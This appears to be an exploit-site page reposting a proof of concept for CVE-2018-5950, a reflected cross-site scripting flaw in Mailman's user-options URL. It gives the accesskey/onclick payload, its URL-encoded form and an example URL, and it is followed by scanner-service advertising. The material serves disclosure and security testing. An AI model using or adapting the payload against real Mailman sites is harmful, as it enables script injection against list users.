mailman 1.x > 2.1.23 cross site scripting (xss)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & cgi vulnerability




mailman 1.x > 2.1.23 cross site scripting (xss) Code Code...
				
# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS) # Type: Reflected XSS # Software: Mailman # Version: >=1.x <= 2.1.23 # Vendor Homepage: https://www.list.org # Original link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950 # POC Author: Valerio Alessandroni # Date: 28/10/2020 # Description: Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL. # # https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS] # Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload # # For this POC I used the following payload # CVE: CVE-2018-5950 "accesskey%3d"x"onclick%3d"alert`XSS`" # Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute. # An URL Encoded version of the payload is %22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22 # URL Example: https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22 # In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X # where X is an arbitrary button inserted as accesskey attribute in the payload.


Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.